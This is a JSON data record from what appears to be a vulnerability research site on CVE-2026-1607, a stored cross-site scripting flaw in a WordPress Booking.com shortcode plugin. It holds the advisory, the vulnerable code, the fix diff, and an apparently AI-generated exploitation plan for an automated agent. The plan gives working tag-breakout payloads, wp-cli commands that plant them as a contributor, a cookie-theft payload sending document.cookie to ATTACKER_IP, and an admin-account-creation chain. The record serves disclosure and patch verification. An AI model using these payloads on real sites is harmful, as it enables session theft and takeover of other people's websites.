[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTv_05rUgz3cjet29tCTAW4CQ6P20KG_OxeQkCH1o7_A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"source_links":35},"CVE-2026-1607","surbma-bookingcom-authenticated-contributor-stored-cross-site-scripting-via-shortcode","Surbma | Booking.com \u003C= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","surbma-bookingcom-shortcode",null,"\u003C=2.1","2.1.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-13 14:39:51","2026-04-14 03:37:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F01280afb-4745-4f36-823e-ed794bb3353a?source=api-prod",1,[22,23],"readme.txt","surbma-bookingcom-shortcode.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-1607\n\n## 1. Vulnerability Summary\nThe **Surbma | Booking.com Shortcode** plugin (versions \u003C= 2.1) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the `surbma_bookingcom_shortcode_shortcode` function, which processes the `[surbma-bookingcom]` shortcode. The plugin accepts a user-defined attribute `param`, which is concatenated directly into a `\u003Cscript>` tag's `src` attribute without any sanitization or escaping (such as `esc_attr` or `esc_url`). This allows an attacker with Contributor-level permissions or higher to inject arbitrary HTML attributes or close the script tag entirely to execute malicious JavaScript.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (standard Gutenberg or Classic editor).\n- **Shortcode**: `[surbma-bookingcom]`\n- **Vulnerable Parameter**: `param`\n- **Authentication**: Required (Contributor role or higher). Contributor is the minimum role that can typically create posts and use shortcodes.\n- **Preconditions**: The plugin must be active. A user with the Contributor role must be able to save a post (even as a draft) and preview it, or an Administrator must view the published post.\n\n## 3. Code Flow\n1.  **Entry Point**: The shortcode is registered in `surbma-bookingcom-shortcode.php`:\n    ```php\n    add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n    ```\n2.  **Processing**: When a page containing the shortcode is rendered, WordPress calls `surbma_bookingcom_shortcode_shortcode($atts)`:\n    ```php\n    function surbma_bookingcom_shortcode_shortcode( $atts ) {\n        extract( shortcode_atts( array(\n            \"param\" => ''\n        ), $atts ) ); \u002F\u002F $param is extracted from $atts['param']\n        return '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n    }\n    ```\n3.  **Sink**: The `$param` variable is concatenated directly into the return string. Because it is not passed through `esc_attr()` or `esc_url()`, characters like `\"` and `>` can be used to break out of the HTML attribute and tag context.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via the standard WordPress post creation\u002Fediting flow. It does **not** involve a custom AJAX or REST API endpoint provided by the plugin.\n- **Nonce Needed**: To create\u002Fsave a post as a Contributor, the standard WordPress `_wpnonce` for post creation is required.\n- **Acquisition**:\n    1.  The automated agent logs in as a Contributor.\n    2.  Navigate to `wp-admin\u002Fpost-new.php`.\n    3.  The `_wpnonce` is present in the page source (usually in the `wp.apiFetch` settings or a hidden input).\n    4.  The agent uses the standard `wp-cli` command `wp post create` to bypass the need for manual nonce handling during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that executes when an Administrator views the post.\n\n### Step-by-Step Plan:\n1.  **Inject via Post Creation**: Use `wp-cli` as a Contributor to create a post containing the malicious shortcode.\n2.  **Payload Selection**:\n    -   **Attribute Breakout**: `param=' \" onload=\"alert(origin)\" '`\n        -   Result: `\u003Cscript ... src=\"...html? \" onload=\"alert(origin)\" \">\u003C\u002Fscript>`\n    -   **Tag Breakout (Cleaner)**: `param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>'`\n        -   Result: `\u003Cscript ... src=\"...html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>`\n3.  **Trigger**: Navigate to the frontend URL of the newly created post while logged in as an Administrator.\n\n### HTTP Request Details (Simulating Preview\u002FSave):\nWhile `wp post create` is simpler, if testing the UI flow:\n- **URL**: `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fpost.php` (for existing) or `wp-admin\u002Fpost-new.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n    - `post_title`: `XSS Test`\n    - `content`: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`\n    - `action`: `editpost`\n    - `post_type`: `post`\n    - `_wpnonce`: `[extracted_nonce]`\n\n## 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Post**: Create the post as the contributor.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Booking Search\" --post_content='[surbma-bookingcom param=\"\\\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\"]' --user=attacker\n    ```\n\n## 7. Expected Results\n- When the page is rendered, the HTML source should contain:\n  ```html\n  \u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>\n  ```\n- The browser should execute the `alert(origin)` call.\n\n## 8. Verification Steps\n1.  **Check Database Content**:\n    ```bash\n    wp post list --post_type=post --field=post_content | grep \"surbma-bookingcom\"\n    ```\n2.  **Verify Frontend Output**:\n    Use `http_request` to fetch the post URL and check for the unescaped script tag:\n    ```bash\n    # Get the URL of the last created post\n    POST_URL=$(wp post list --post_type=post --format=ids | xargs -n 1 wp post get --field=url | head -n 1)\n    # Check if the payload is present in the response\n    # (The agent will use browser_navigate and check for the alert)\n    ```\n\n## 9. Alternative Approaches\nIf `alert()` is blocked or hard to detect:\n- **Cookie Exfiltration**: `param='\">\u003C\u002Fscript>\u003Cscript>fetch(\"http:\u002F\u002FATTACKER_IP\u002F?c=\" + btoa(document.cookie))\u003C\u002Fscript>'`\n- **Admin User Creation**: If the target is an Administrator, inject a script that uses the REST API or `user-new.php` to create a new admin account (standard XSS-to-RCE\u002FAdmin chain).\n- **Attribute Injection**: Some browsers might behave differently with `src` attribute breakout. An alternative is `param=' \" onerror=\"alert(1)\" '` if the `src` URL fails to load, though `onload` is more reliable for `\u003Cscript>` tags if the `src` is valid. However, since we close the tag in the primary strategy, that remains the most robust method.","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `surbma-bookingcom` shortcode in versions up to 2.1. This occurs because the `param` attribute is concatenated directly into a script tag's source URL without sanitization or escaping, allowing authenticated contributors to inject arbitrary JavaScript.","\u002F\u002F surbma-bookingcom-shortcode.php lines 28-33\nfunction surbma_bookingcom_shortcode_shortcode( $atts ) {\n\textract( shortcode_atts( array(\n\t\t\"param\" => ''\n\t), $atts ) );\n\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n}\nadd_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php\t2020-02-10 13:24:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\t2026-04-12 14:58:34.000000000 +0000\n@@ -5,7 +5,7 @@\n Plugin URI: https:\u002F\u002Fsurbma.com\u002Fwordpress-plugins\u002F\n Description: A simple shortcode to include Booking.com search box into WordPress.\n \n-Version: 2.0\n+Version: 2.1.1\n \n Author: Surbma\n Author URI: https:\u002F\u002Fsurbma.com\u002F\n@@ -17,20 +17,29 @@\n *\u002F\n \n \u002F\u002F Prevent direct access to the plugin\n-if ( !defined( 'ABSPATH' ) ) {\n-\tdie( 'Good try! :)' );\n-}\n+defined( 'ABSPATH' ) || exit;\n \n \u002F\u002F Localization\n-function surbma_bookingcom_shortcode_init() {\n+add_action( 'init', function() {\n \tload_plugin_textdomain( 'surbma-bookingcom-shortcode', false, dirname( plugin_basename( __FILE__ ) ) . '\u002Flanguages\u002F' );\n-}\n-add_action( 'plugins_loaded', 'surbma_bookingcom_shortcode_init' );\n+} );\n \n-function surbma_bookingcom_shortcode_shortcode( $atts ) {\n-\textract( shortcode_atts( array(\n-\t\t\"param\" => ''\n-\t), $atts ) );\n-\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n-}\n-add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n+add_shortcode( 'surbma-bookingcom', function( $atts ) {\n+\t$atts = shortcode_atts(\n+\t\tarray(\n+\t\t\t'param' => '',\n+\t\t),\n+\t\t$atts,\n+\t\t'surbma-bookingcom'\n+\t);\n+\n+\t$param = isset( $atts['param'] ) ? $atts['param'] : '';\n+\t$param = is_string( $param ) ? wp_strip_all_tags( $param ) : '';\n+\n+\t$url = 'https:\u002F\u002Fwww.booking.com\u002Fgeneral.html';\n+\tif ( '' !== $param ) {\n+\t\t$url .= '?' . rawurlencode( $param );\n+\t}\n+\n+\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"' . esc_url( $url, array( 'https' ) ) . '\">\u003C\u002Fscript>';\n+} );","1. Authenticate to the WordPress site as a user with Contributor-level permissions.\n2. Create a new post or page via the WordPress editor.\n3. Insert the `[surbma-bookingcom]` shortcode into the post content, supplying a malicious payload in the `param` attribute. A working payload uses HTML tag breakout: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`.\n4. Save the post as a draft or publish it.\n5. When an administrator or any other site visitor views the post, the browser will interpret the closing `\">\u003C\u002Fscript>` sequence, terminate the original Booking.com script tag, and execute the subsequent injected `\u003Cscript>` block.","gemini-3-flash-preview","2026-04-16 15:59:00","2026-04-16 15:59:21",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsurbma-bookingcom-shortcode\u002Ftags"]